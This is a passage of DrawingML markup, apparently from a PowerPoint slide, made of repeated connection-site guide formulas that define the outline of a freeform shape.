              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 408998 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 418597 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 430843 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 441487 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 442471 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 444782 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448545 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 459335 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY104" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY105" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY106" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY107" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY108" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY109" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY110" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 151770 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 345956 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 408998 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 418597 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 430843 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 441487 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 442471 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448545 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 459335 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY104" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY105" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY106" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY107" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY108" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY109" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 151770 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
